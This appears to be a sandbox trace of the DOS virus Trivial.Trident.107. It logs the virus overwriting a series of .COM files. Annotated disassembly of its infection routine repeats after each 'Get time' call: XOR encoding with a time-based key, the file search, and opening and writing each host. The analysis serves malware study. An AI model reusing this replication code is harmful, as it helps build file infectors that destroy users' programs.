Sample viewer

vx.netlux.org/Virus.DOS.Trivial.Trident.107


Syscalls:

Time | Syscall Op (DOS INT 21h function number, decimal) | Syscall Name
2018-12-17T22:59:24.510300664Z 44 PC: 12a59 | Get time
0x12a59: mov byte ptr [0x109], dl
; Trace excerpt (16-bit real-mode DOS, Intel syntax). It continues from the instruction at
; 0x12a59 on the preceding row and stops before the write call, so the routine is not fully shown.
; First part: XOR-encode bytes from 0x112 into 0x175 using the key byte stored at 0x109.
; NOTE(review): 0x112 - 0x100 = 18, which matches the 18-byte write in the trace; presumably that
; write is the leading stub (it would include the key byte at 0x109) - confirm outside this excerpt.
0x12a5d: mov si, 0x112  ; source offset of the bytes to encode
0x12a60: mov di, 0x175  ; destination offset for the encoded copy
0x12a63: mov cx, 0x59  ; counter starts at 0x59 (89)
0x12a66: lodsb al, byte ptr [si]  ; al = next source byte, si advances
0x12a67: xor al, byte ptr [0x109]  ; XOR with the key byte written from DL just before this excerpt
0x12a6b: stosb byte ptr es:[di], al  ; store the encoded byte, di advances
0x12a6c: dec cx
0x12a6d: cmp cx, -1  ; exit only once cx has wrapped past 0, so the body runs 0x5A (90) times
0x12a70: jne 0x12a66  ; one more pass than the 89 bytes the trace shows written
0x12a72: pop ax  ; AX comes from a push outside this excerpt; presumably AH = 4Eh/4Fh - confirm
0x12a73: xor cx, cx  ; CX = 0 (would be the attribute mask if this is Find first - assumption)
0x12a75: mov dx, 0x165  ; DS:DX argument for the call; presumably the search filespec - not shown here
0x12a78: int 0x21  ; the trace logs this call as Find first / Find next (return PC 12a7a)
0x12a7a: jb 0x12aa3  ; CF set = DOS reported an error; skips the open/write sequence below
0x12a7c: mov ax, 0x3d01  ; AH=3Dh open existing file, AL=01h write-only access
0x12a7f: mov dx, 0x9e  ; filename pointer; 0x9E = 0x80 + 0x1E, the found-name field if the DTA is at its default - assumption
0x12a82: int 0x21  ; logged by the trace as Open file (return PC 12a84)
0x12a84: mov bx, ax  ; BX = value returned in AX (the handle); no CF check follows the open in this excerpt
0x12a86: mov ah, 0x40  ; AH=40h write to handle; the trace logs the writes at PC 12a91 and 12a9a
2018-12-17T22:59:24.514031477Z 78 PC: 12a7a | Find first file
2018-12-17T22:59:24.521623282Z 61 PC: 12a84 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:59:24.529166852Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:59:24.536806326Z 64 PC: 12a9a | Write file or device (Write 89 bytes on handle 5)
2018-12-17T22:59:24.540438065Z 62 PC: 12a9e | Close file
2018-12-17T22:59:24.556281137Z 44 PC: 12a59 | Get time
0x12a59: mov byte ptr [0x109], dl
; Trace excerpt (16-bit real-mode DOS, Intel syntax). It continues from the instruction at
; 0x12a59 on the preceding row and stops before the write call, so the routine is not fully shown.
; First part: XOR-encode bytes from 0x112 into 0x175 using the key byte stored at 0x109.
; NOTE(review): 0x112 - 0x100 = 18, which matches the 18-byte write in the trace; presumably that
; write is the leading stub (it would include the key byte at 0x109) - confirm outside this excerpt.
0x12a5d: mov si, 0x112  ; source offset of the bytes to encode
0x12a60: mov di, 0x175  ; destination offset for the encoded copy
0x12a63: mov cx, 0x59  ; counter starts at 0x59 (89)
0x12a66: lodsb al, byte ptr [si]  ; al = next source byte, si advances
0x12a67: xor al, byte ptr [0x109]  ; XOR with the key byte written from DL just before this excerpt
0x12a6b: stosb byte ptr es:[di], al  ; store the encoded byte, di advances
0x12a6c: dec cx
0x12a6d: cmp cx, -1  ; exit only once cx has wrapped past 0, so the body runs 0x5A (90) times
0x12a70: jne 0x12a66  ; one more pass than the 89 bytes the trace shows written
0x12a72: pop ax  ; AX comes from a push outside this excerpt; presumably AH = 4Eh/4Fh - confirm
0x12a73: xor cx, cx  ; CX = 0 (would be the attribute mask if this is Find first - assumption)
0x12a75: mov dx, 0x165  ; DS:DX argument for the call; presumably the search filespec - not shown here
0x12a78: int 0x21  ; the trace logs this call as Find first / Find next (return PC 12a7a)
0x12a7a: jb 0x12aa3  ; CF set = DOS reported an error; skips the open/write sequence below
0x12a7c: mov ax, 0x3d01  ; AH=3Dh open existing file, AL=01h write-only access
0x12a7f: mov dx, 0x9e  ; filename pointer; 0x9E = 0x80 + 0x1E, the found-name field if the DTA is at its default - assumption
0x12a82: int 0x21  ; logged by the trace as Open file (return PC 12a84)
0x12a84: mov bx, ax  ; BX = value returned in AX (the handle); no CF check follows the open in this excerpt
0x12a86: mov ah, 0x40  ; AH=40h write to handle; the trace logs the writes at PC 12a91 and 12a9a
2018-12-17T22:59:24.559303224Z 79 PC: 12a7a | Find next file
2018-12-17T22:59:24.563594038Z 61 PC: 12a84 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:59:24.570906848Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:59:24.578505917Z 64 PC: 12a9a | Write file or device (Write 89 bytes on handle 5)
2018-12-17T22:59:24.584630682Z 62 PC: 12a9e | Close file
2018-12-17T22:59:24.59468925Z 44 PC: 12a59 | Get time
0x12a59: mov byte ptr [0x109], dl
; Trace excerpt (16-bit real-mode DOS, Intel syntax). It continues from the instruction at
; 0x12a59 on the preceding row and stops before the write call, so the routine is not fully shown.
; First part: XOR-encode bytes from 0x112 into 0x175 using the key byte stored at 0x109.
; NOTE(review): 0x112 - 0x100 = 18, which matches the 18-byte write in the trace; presumably that
; write is the leading stub (it would include the key byte at 0x109) - confirm outside this excerpt.
0x12a5d: mov si, 0x112  ; source offset of the bytes to encode
0x12a60: mov di, 0x175  ; destination offset for the encoded copy
0x12a63: mov cx, 0x59  ; counter starts at 0x59 (89)
0x12a66: lodsb al, byte ptr [si]  ; al = next source byte, si advances
0x12a67: xor al, byte ptr [0x109]  ; XOR with the key byte written from DL just before this excerpt
0x12a6b: stosb byte ptr es:[di], al  ; store the encoded byte, di advances
0x12a6c: dec cx
0x12a6d: cmp cx, -1  ; exit only once cx has wrapped past 0, so the body runs 0x5A (90) times
0x12a70: jne 0x12a66  ; one more pass than the 89 bytes the trace shows written
0x12a72: pop ax  ; AX comes from a push outside this excerpt; presumably AH = 4Eh/4Fh - confirm
0x12a73: xor cx, cx  ; CX = 0 (would be the attribute mask if this is Find first - assumption)
0x12a75: mov dx, 0x165  ; DS:DX argument for the call; presumably the search filespec - not shown here
0x12a78: int 0x21  ; the trace logs this call as Find first / Find next (return PC 12a7a)
0x12a7a: jb 0x12aa3  ; CF set = DOS reported an error; skips the open/write sequence below
0x12a7c: mov ax, 0x3d01  ; AH=3Dh open existing file, AL=01h write-only access
0x12a7f: mov dx, 0x9e  ; filename pointer; 0x9E = 0x80 + 0x1E, the found-name field if the DTA is at its default - assumption
0x12a82: int 0x21  ; logged by the trace as Open file (return PC 12a84)
0x12a84: mov bx, ax  ; BX = value returned in AX (the handle); no CF check follows the open in this excerpt
0x12a86: mov ah, 0x40  ; AH=40h write to handle; the trace logs the writes at PC 12a91 and 12a9a
2018-12-17T22:59:24.597715419Z 79 PC: 12a7a | Find next file
2018-12-17T22:59:24.601603009Z 61 PC: 12a84 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:59:24.609682913Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:59:24.617327066Z 64 PC: 12a9a | Write file or device (Write 89 bytes on handle 5)
2018-12-17T22:59:24.621827105Z 62 PC: 12a9e | Close file
2018-12-17T22:59:24.631983972Z 44 PC: 12a59 | Get time
0x12a59: mov byte ptr [0x109], dl
; Trace excerpt (16-bit real-mode DOS, Intel syntax). It continues from the instruction at
; 0x12a59 on the preceding row and stops before the write call, so the routine is not fully shown.
; First part: XOR-encode bytes from 0x112 into 0x175 using the key byte stored at 0x109.
; NOTE(review): 0x112 - 0x100 = 18, which matches the 18-byte write in the trace; presumably that
; write is the leading stub (it would include the key byte at 0x109) - confirm outside this excerpt.
0x12a5d: mov si, 0x112  ; source offset of the bytes to encode
0x12a60: mov di, 0x175  ; destination offset for the encoded copy
0x12a63: mov cx, 0x59  ; counter starts at 0x59 (89)
0x12a66: lodsb al, byte ptr [si]  ; al = next source byte, si advances
0x12a67: xor al, byte ptr [0x109]  ; XOR with the key byte written from DL just before this excerpt
0x12a6b: stosb byte ptr es:[di], al  ; store the encoded byte, di advances
0x12a6c: dec cx
0x12a6d: cmp cx, -1  ; exit only once cx has wrapped past 0, so the body runs 0x5A (90) times
0x12a70: jne 0x12a66  ; one more pass than the 89 bytes the trace shows written
0x12a72: pop ax  ; AX comes from a push outside this excerpt; presumably AH = 4Eh/4Fh - confirm
0x12a73: xor cx, cx  ; CX = 0 (would be the attribute mask if this is Find first - assumption)
0x12a75: mov dx, 0x165  ; DS:DX argument for the call; presumably the search filespec - not shown here
0x12a78: int 0x21  ; the trace logs this call as Find first / Find next (return PC 12a7a)
0x12a7a: jb 0x12aa3  ; CF set = DOS reported an error; skips the open/write sequence below
0x12a7c: mov ax, 0x3d01  ; AH=3Dh open existing file, AL=01h write-only access
0x12a7f: mov dx, 0x9e  ; filename pointer; 0x9E = 0x80 + 0x1E, the found-name field if the DTA is at its default - assumption
0x12a82: int 0x21  ; logged by the trace as Open file (return PC 12a84)
0x12a84: mov bx, ax  ; BX = value returned in AX (the handle); no CF check follows the open in this excerpt
0x12a86: mov ah, 0x40  ; AH=40h write to handle; the trace logs the writes at PC 12a91 and 12a9a
2018-12-17T22:59:24.634759827Z 79 PC: 12a7a | Find next file
2018-12-17T22:59:24.639424706Z 61 PC: 12a84 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:59:24.651502672Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:59:24.662020286Z 64 PC: 12a9a | Write file or device (Write 89 bytes on handle 5)
2018-12-17T22:59:24.665499983Z 62 PC: 12a9e | Close file
2018-12-17T22:59:24.675770016Z 44 PC: 12a59 | Get time
0x12a59: mov byte ptr [0x109], dl
; Trace excerpt (16-bit real-mode DOS, Intel syntax). It continues from the instruction at
; 0x12a59 on the preceding row and stops before the write call, so the routine is not fully shown.
; First part: XOR-encode bytes from 0x112 into 0x175 using the key byte stored at 0x109.
; NOTE(review): 0x112 - 0x100 = 18, which matches the 18-byte write in the trace; presumably that
; write is the leading stub (it would include the key byte at 0x109) - confirm outside this excerpt.
0x12a5d: mov si, 0x112  ; source offset of the bytes to encode
0x12a60: mov di, 0x175  ; destination offset for the encoded copy
0x12a63: mov cx, 0x59  ; counter starts at 0x59 (89)
0x12a66: lodsb al, byte ptr [si]  ; al = next source byte, si advances
0x12a67: xor al, byte ptr [0x109]  ; XOR with the key byte written from DL just before this excerpt
0x12a6b: stosb byte ptr es:[di], al  ; store the encoded byte, di advances
0x12a6c: dec cx
0x12a6d: cmp cx, -1  ; exit only once cx has wrapped past 0, so the body runs 0x5A (90) times
0x12a70: jne 0x12a66  ; one more pass than the 89 bytes the trace shows written
0x12a72: pop ax  ; AX comes from a push outside this excerpt; presumably AH = 4Eh/4Fh - confirm
0x12a73: xor cx, cx  ; CX = 0 (would be the attribute mask if this is Find first - assumption)
0x12a75: mov dx, 0x165  ; DS:DX argument for the call; presumably the search filespec - not shown here
0x12a78: int 0x21  ; the trace logs this call as Find first / Find next (return PC 12a7a)
0x12a7a: jb 0x12aa3  ; CF set = DOS reported an error; skips the open/write sequence below
0x12a7c: mov ax, 0x3d01  ; AH=3Dh open existing file, AL=01h write-only access
0x12a7f: mov dx, 0x9e  ; filename pointer; 0x9E = 0x80 + 0x1E, the found-name field if the DTA is at its default - assumption
0x12a82: int 0x21  ; logged by the trace as Open file (return PC 12a84)
0x12a84: mov bx, ax  ; BX = value returned in AX (the handle); no CF check follows the open in this excerpt
0x12a86: mov ah, 0x40  ; AH=40h write to handle; the trace logs the writes at PC 12a91 and 12a9a
2018-12-17T22:59:24.67828698Z 79 PC: 12a7a | Find next file
2018-12-17T22:59:24.681649556Z 61 PC: 12a84 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:59:24.688849135Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:59:24.699779754Z 64 PC: 12a9a | Write file or device (Write 89 bytes on handle 5)
2018-12-17T22:59:24.706123828Z 62 PC: 12a9e | Close file
2018-12-17T22:59:24.721806542Z 44 PC: 12a59 | Get time
0x12a59: mov byte ptr [0x109], dl
; Trace excerpt (16-bit real-mode DOS, Intel syntax). It continues from the instruction at
; 0x12a59 on the preceding row and stops before the write call, so the routine is not fully shown.
; First part: XOR-encode bytes from 0x112 into 0x175 using the key byte stored at 0x109.
; NOTE(review): 0x112 - 0x100 = 18, which matches the 18-byte write in the trace; presumably that
; write is the leading stub (it would include the key byte at 0x109) - confirm outside this excerpt.
0x12a5d: mov si, 0x112  ; source offset of the bytes to encode
0x12a60: mov di, 0x175  ; destination offset for the encoded copy
0x12a63: mov cx, 0x59  ; counter starts at 0x59 (89)
0x12a66: lodsb al, byte ptr [si]  ; al = next source byte, si advances
0x12a67: xor al, byte ptr [0x109]  ; XOR with the key byte written from DL just before this excerpt
0x12a6b: stosb byte ptr es:[di], al  ; store the encoded byte, di advances
0x12a6c: dec cx
0x12a6d: cmp cx, -1  ; exit only once cx has wrapped past 0, so the body runs 0x5A (90) times
0x12a70: jne 0x12a66  ; one more pass than the 89 bytes the trace shows written
0x12a72: pop ax  ; AX comes from a push outside this excerpt; presumably AH = 4Eh/4Fh - confirm
0x12a73: xor cx, cx  ; CX = 0 (would be the attribute mask if this is Find first - assumption)
0x12a75: mov dx, 0x165  ; DS:DX argument for the call; presumably the search filespec - not shown here
0x12a78: int 0x21  ; the trace logs this call as Find first / Find next (return PC 12a7a)
0x12a7a: jb 0x12aa3  ; CF set = DOS reported an error; skips the open/write sequence below
0x12a7c: mov ax, 0x3d01  ; AH=3Dh open existing file, AL=01h write-only access
0x12a7f: mov dx, 0x9e  ; filename pointer; 0x9E = 0x80 + 0x1E, the found-name field if the DTA is at its default - assumption
0x12a82: int 0x21  ; logged by the trace as Open file (return PC 12a84)
0x12a84: mov bx, ax  ; BX = value returned in AX (the handle); no CF check follows the open in this excerpt
0x12a86: mov ah, 0x40  ; AH=40h write to handle; the trace logs the writes at PC 12a91 and 12a9a
2018-12-17T22:59:24.724930693Z 79 PC: 12a7a | Find next file
2018-12-17T22:59:24.727689075Z 61 PC: 12a84 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:59:24.735283733Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:59:24.742901938Z 64 PC: 12a9a | Write file or device (Write 89 bytes on handle 5)
2018-12-17T22:59:24.745727392Z 62 PC: 12a9e | Close file
2018-12-17T22:59:24.754282606Z 44 PC: 12a59 | Get time
0x12a59: mov byte ptr [0x109], dl
; Trace excerpt (16-bit real-mode DOS, Intel syntax). It continues from the instruction at
; 0x12a59 on the preceding row and stops before the write call, so the routine is not fully shown.
; First part: XOR-encode bytes from 0x112 into 0x175 using the key byte stored at 0x109.
; NOTE(review): 0x112 - 0x100 = 18, which matches the 18-byte write in the trace; presumably that
; write is the leading stub (it would include the key byte at 0x109) - confirm outside this excerpt.
0x12a5d: mov si, 0x112  ; source offset of the bytes to encode
0x12a60: mov di, 0x175  ; destination offset for the encoded copy
0x12a63: mov cx, 0x59  ; counter starts at 0x59 (89)
0x12a66: lodsb al, byte ptr [si]  ; al = next source byte, si advances
0x12a67: xor al, byte ptr [0x109]  ; XOR with the key byte written from DL just before this excerpt
0x12a6b: stosb byte ptr es:[di], al  ; store the encoded byte, di advances
0x12a6c: dec cx
0x12a6d: cmp cx, -1  ; exit only once cx has wrapped past 0, so the body runs 0x5A (90) times
0x12a70: jne 0x12a66  ; one more pass than the 89 bytes the trace shows written
0x12a72: pop ax  ; AX comes from a push outside this excerpt; presumably AH = 4Eh/4Fh - confirm
0x12a73: xor cx, cx  ; CX = 0 (would be the attribute mask if this is Find first - assumption)
0x12a75: mov dx, 0x165  ; DS:DX argument for the call; presumably the search filespec - not shown here
0x12a78: int 0x21  ; the trace logs this call as Find first / Find next (return PC 12a7a)
0x12a7a: jb 0x12aa3  ; CF set = DOS reported an error; skips the open/write sequence below
0x12a7c: mov ax, 0x3d01  ; AH=3Dh open existing file, AL=01h write-only access
0x12a7f: mov dx, 0x9e  ; filename pointer; 0x9E = 0x80 + 0x1E, the found-name field if the DTA is at its default - assumption
0x12a82: int 0x21  ; logged by the trace as Open file (return PC 12a84)
0x12a84: mov bx, ax  ; BX = value returned in AX (the handle); no CF check follows the open in this excerpt
0x12a86: mov ah, 0x40  ; AH=40h write to handle; the trace logs the writes at PC 12a91 and 12a9a
2018-12-17T22:59:24.757019092Z 79 PC: 12a7a | Find next file
2018-12-17T22:59:24.760112921Z 61 PC: 12a84 | Open file (Filename = 'PAH.COM')
2018-12-17T22:59:24.767436589Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:59:24.775268583Z 64 PC: 12a9a | Write file or device (Write 89 bytes on handle 5)
2018-12-17T22:59:24.779540531Z 62 PC: 12a9e | Close file
2018-12-17T22:59:24.788445429Z 44 PC: 12a59 | Get time
0x12a59: mov byte ptr [0x109], dl
; Trace excerpt (16-bit real-mode DOS, Intel syntax). It continues from the instruction at
; 0x12a59 on the preceding row and stops before the write call, so the routine is not fully shown.
; First part: XOR-encode bytes from 0x112 into 0x175 using the key byte stored at 0x109.
; NOTE(review): 0x112 - 0x100 = 18, which matches the 18-byte write in the trace; presumably that
; write is the leading stub (it would include the key byte at 0x109) - confirm outside this excerpt.
0x12a5d: mov si, 0x112  ; source offset of the bytes to encode
0x12a60: mov di, 0x175  ; destination offset for the encoded copy
0x12a63: mov cx, 0x59  ; counter starts at 0x59 (89)
0x12a66: lodsb al, byte ptr [si]  ; al = next source byte, si advances
0x12a67: xor al, byte ptr [0x109]  ; XOR with the key byte written from DL just before this excerpt
0x12a6b: stosb byte ptr es:[di], al  ; store the encoded byte, di advances
0x12a6c: dec cx
0x12a6d: cmp cx, -1  ; exit only once cx has wrapped past 0, so the body runs 0x5A (90) times
0x12a70: jne 0x12a66  ; one more pass than the 89 bytes the trace shows written
0x12a72: pop ax  ; AX comes from a push outside this excerpt; presumably AH = 4Eh/4Fh - confirm
0x12a73: xor cx, cx  ; CX = 0 (would be the attribute mask if this is Find first - assumption)
0x12a75: mov dx, 0x165  ; DS:DX argument for the call; presumably the search filespec - not shown here
0x12a78: int 0x21  ; the trace logs this call as Find first / Find next (return PC 12a7a)
0x12a7a: jb 0x12aa3  ; CF set = DOS reported an error; skips the open/write sequence below
0x12a7c: mov ax, 0x3d01  ; AH=3Dh open existing file, AL=01h write-only access
0x12a7f: mov dx, 0x9e  ; filename pointer; 0x9E = 0x80 + 0x1E, the found-name field if the DTA is at its default - assumption
0x12a82: int 0x21  ; logged by the trace as Open file (return PC 12a84)
0x12a84: mov bx, ax  ; BX = value returned in AX (the handle); no CF check follows the open in this excerpt
0x12a86: mov ah, 0x40  ; AH=40h write to handle; the trace logs the writes at PC 12a91 and 12a9a
2018-12-17T22:59:24.792256769Z 79 PC: 12a7a | Find next file
2018-12-17T22:59:24.795562525Z 61 PC: 12a84 | Open file (Filename = 'TEST.COM')
2018-12-17T22:59:24.803238391Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:59:24.807040896Z 64 PC: 12a9a | Write file or device (Write 89 bytes on handle 5)
2018-12-17T22:59:24.81037017Z 62 PC: 12a9e | Close file
2018-12-17T22:59:24.81932636Z 44 PC: 12a59 | Get time
0x12a59: mov byte ptr [0x109], dl
; Trace excerpt (16-bit real-mode DOS, Intel syntax). It continues from the instruction at
; 0x12a59 on the preceding row and stops before the write call, so the routine is not fully shown.
; First part: XOR-encode bytes from 0x112 into 0x175 using the key byte stored at 0x109.
; NOTE(review): 0x112 - 0x100 = 18, which matches the 18-byte write in the trace; presumably that
; write is the leading stub (it would include the key byte at 0x109) - confirm outside this excerpt.
0x12a5d: mov si, 0x112  ; source offset of the bytes to encode
0x12a60: mov di, 0x175  ; destination offset for the encoded copy
0x12a63: mov cx, 0x59  ; counter starts at 0x59 (89)
0x12a66: lodsb al, byte ptr [si]  ; al = next source byte, si advances
0x12a67: xor al, byte ptr [0x109]  ; XOR with the key byte written from DL just before this excerpt
0x12a6b: stosb byte ptr es:[di], al  ; store the encoded byte, di advances
0x12a6c: dec cx
0x12a6d: cmp cx, -1  ; exit only once cx has wrapped past 0, so the body runs 0x5A (90) times
0x12a70: jne 0x12a66  ; one more pass than the 89 bytes the trace shows written
0x12a72: pop ax  ; AX comes from a push outside this excerpt; presumably AH = 4Eh/4Fh - confirm
0x12a73: xor cx, cx  ; CX = 0 (would be the attribute mask if this is Find first - assumption)
0x12a75: mov dx, 0x165  ; DS:DX argument for the call; presumably the search filespec - not shown here
0x12a78: int 0x21  ; the trace logs this call as Find first / Find next (return PC 12a7a)
0x12a7a: jb 0x12aa3  ; CF set = DOS reported an error; skips the open/write sequence below
0x12a7c: mov ax, 0x3d01  ; AH=3Dh open existing file, AL=01h write-only access
0x12a7f: mov dx, 0x9e  ; filename pointer; 0x9E = 0x80 + 0x1E, the found-name field if the DTA is at its default - assumption
0x12a82: int 0x21  ; logged by the trace as Open file (return PC 12a84)
0x12a84: mov bx, ax  ; BX = value returned in AX (the handle); no CF check follows the open in this excerpt
0x12a86: mov ah, 0x40  ; AH=40h write to handle; the trace logs the writes at PC 12a91 and 12a9a
2018-12-17T22:59:24.823062248Z 79 PC: 12a7a | Find next file